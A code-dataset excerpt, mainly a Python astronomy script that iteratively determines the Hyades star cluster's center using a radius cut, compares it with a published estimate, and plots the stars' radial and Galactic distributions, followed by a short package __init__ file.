1661142 | <filename>hyades/determine-cluster-center.py<gh_stars>1-10
"""
Determine cluster center with a radius cut as the position
where the postional membership within the radius cut does not change.
- The radius cut should be large enough to contain substantial number of stars
otherwise it will just depend on the statistical fluctuation of the mean of
small number of stars.
- The radius cut should be not too large as then, it
will be subject to larger contamination rate far from the cluster.
"""
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import astropy.coordinates as coord
import kinesis as kn
import data
kn.set_mpl_style()
def xyz_icrs_to_galactic(xyz):
c = coord.ICRS(*xyz, representation_type="cartesian")
return c.transform_to(coord.Galactic).cartesian.xyz.value
df = data.load_hyades_dataset()
df = df.loc[df["Member_r19"] != "other"].reset_index(drop=True)
print(len(df), "rows")
cl_gaia = df.loc[df["in_dr2"] == True].copy()
b_c_icrs_cl_gaia_mean = cl_gaia.g.icrs.cartesian.xyz.mean(axis=1).value
b_c_galactic_cl_gaia_mean = xyz_icrs_to_galactic(b_c_icrs_cl_gaia_mean)
xyz = df.g.icrs.cartesian.xyz.value
# list storage for boolean flag array; initially consider all stars
in_rcut = [np.ones(xyz.shape[1]).astype(bool)]
# list storage for boolean flag array; initially set with Gaia Collab DR2 sample
r_cut = 10 # pc, radius cut
niter = 20 # maximum number of iteration
print("N={:d} r_cut={:.2f} max iter={:d}".format(len(df), r_cut, niter))
for i in range(niter):
prev = in_rcut[-1]
b_c = xyz[:, prev].mean(axis=1)
r_c = np.linalg.norm(xyz - b_c[:, None], axis=0)
current = r_c < r_cut
bool_remove = (~current) & (prev)
bool_include = (current) & (~prev)
if (current == prev).all():
print("iter {:2d} b_c={} membership converged".format(i, b_c))
break
else:
print(
"iter {:2d} b_c={} removing {:d} including {:d}".format(
i, b_c, bool_remove.sum(), bool_include.sum()
)
)
in_rcut.append(current)
# report final values
b_c_icrs_iter_mean = b_c
b_c_galactic_iter_mean = xyz_icrs_to_galactic(b_c)
r_c = np.linalg.norm(xyz - b_c_icrs_iter_mean[:, None], axis=0)
n_r_cut = (r_c < r_cut).sum()
n_r_cut_p05 = (r_c < r_cut + 0.5).sum()
n_r_cut_m05 = (r_c < r_cut - 0.5).sum()
print("final b_c icrs =", b_c_icrs_iter_mean)
print("final b_c galactic =", b_c_galactic_iter_mean)
print(n_r_cut, n_r_cut_p05, n_r_cut_m05)
reino2018 = dict(
b_c_galactic=np.array([-44.16, 0.66, -17.76]), # pc
b_c_galactic_err=np.array([0.74, 0.39, 0.41]), # pc
)
report_df = pd.DataFrame.from_dict(
{
"final b_c icrs": b_c_icrs_iter_mean,
"final b_c galactic": b_c_galactic_iter_mean,
"mean of cl gaia icrs": b_c_icrs_cl_gaia_mean,
"mean of cl gaia galactic": b_c_galactic_cl_gaia_mean,
"Reino 2018 galactic": reino2018["b_c_galactic"],
},
orient="index",
columns=("x", "y", "z"),
)
print(report_df)
#%% summary plot: distribution of stars from the center
fig, (axhist, axdens) = plt.subplots(1, 2, figsize=(7, 3), sharex=True)
bins = np.logspace(-1, 2.5, 32)
axhist.hist(r_c, bins)
axhist.axvline(r_cut, c="k")
axhist.set_xlabel("$r_c$ [pc]")
axhist.set_ylabel("count [pc]")
axhist.set_xscale("log")
s, be = np.histogram(r_c, bins)
bc = (be[1:] + be[:-1]) * 0.5
numdens = s / (np.pi * 4 * bc ** 2) / (be[1] - be[0])
axdens.plot(bc, numdens, "o-")
axdens.axvline(r_cut, c="k")
axdens.set_xscale("log")
axdens.set_yscale("log")
axdens.set_ylim(1e-3, 200)
axdens.set_xlabel("$r_c$ [pc]")
axdens.set_ylabel("number density [pc$^{-3}$]")
fig.tight_layout()
fig.savefig("../report/r_c_dist.pdf")
#%% summary plot: distribution of stars in Galactic coordinates
fig, (ax_xy, ax_xz) = plt.subplots(2, 1, figsize=(3, 6), sharex=True,)
ax_xy.set_aspect("equal")
ax_xz.set_aspect("equal")
ax_xy.scatter(df["gx"], df["gy"], s=1, c="tab:gray")
ax_xz.scatter(df["gx"], df["gz"], s=1, c="tab:gray")
def add_circle(center, radius, ax=None):
from matplotlib.patches import Circle
if ax is None:
ax = plt.gca()
circle = Circle(center, radius, facecolor="None", edgecolor="k")
ax.add_patch(circle)
xy_cen = [b_c_galactic_iter_mean[0], b_c_galactic_iter_mean[1]]
xz_cen = [b_c_galactic_iter_mean[0], b_c_galactic_iter_mean[2]]
add_circle(xy_cen, r_cut, ax=ax_xy)
add_circle(xz_cen, r_cut, ax=ax_xz)
ax_xy.set_xlabel("$x$ [pc]")
ax_xy.set_ylabel("$y$ [pc]")
ax_xz.set_xlabel("$x$ [pc]")
ax_xz.set_ylabel("$z$ [pc]")
fig.suptitle("Galactic")
fig.tight_layout()
fig.savefig("report/galactic_xyz.pdf")
print("check radial velocities")
N_rv = (df["radial_velocity"].notna()).sum()
N_10 = (r_c < 10).sum()
N_10_rv = ((r_c < 10) & (df["radial_velocity"].notna())).sum()
print("N rv =", N_rv)
print("N(r_c<10) = {} N(r_c<10 and has rv) = {}".format(N_10, N_10_rv))
print("N(r_c>10) = {} N(r_c<10 and has rv) = {}".format(len(df) - N_10, N_rv - N_10_rv))
| StarcoderdataPython |
3300241 | #
# Copyright (c) 2021 kumattau
#
# Use of this source code is governed by a MIT License
#
from .greetings import __doc__, __all__, __version__
from .greetings import *
| StarcoderdataPython |
Subsets and Splits